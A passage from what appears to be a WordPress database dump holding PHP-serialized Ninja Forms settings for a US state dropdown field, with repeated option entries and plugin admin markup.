dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:43;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:9:\"Tennessee\";s:5:\"value\";s:2:\"TN\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:44;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:5:\"Texas\";s:5:\"value\";s:2:\"TX\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:45;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:4:\"Utah\";s:5:\"value\";s:2:\"UT\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:46;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:7:\"Vermont\";s:5:\"value\";s:2:\"VT\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:47;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:8:\"Virginia\";s:5:\"value\";s:2:\"VA\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:48;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:10:\"Washington\";s:5:\"value\";s:2:\"WA\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:49;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:13:\"West Virginia\";s:5:\"value\";s:2:\"WV\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:50;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:9:\"Wisconsin\";s:5:\"value\";s:2:\"WI\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:51;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:7:\"Wyoming\";s:5:\"value\";s:2:\"WY\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}}','options','a:52:{i:0;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:24:\"Please Choose Your State\";s:5:\"value\";s:24:\"Please Choose Your State\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:1;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:7:\"Alabama\";s:5:\"value\";s:2:\"AL\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:2;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:6:\"Alaska\";s:5:\"value\";s:2:\"AK\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:3;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:7:\"Arizona\";s:5:\"value\";s:2:\"AZ\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:4;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:8:\"Arkansas\";s:5:\"value\";s:2:\"AR\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:5;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:10:\"California\";s:5:\"value\";s:2:\"CA\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:6;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:8:\"Colorado\";s:5:\"value\";s:2:\"CO\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:7;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:11:\"Connecticut\";s:5:\"value\";s:2:\"CT\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> 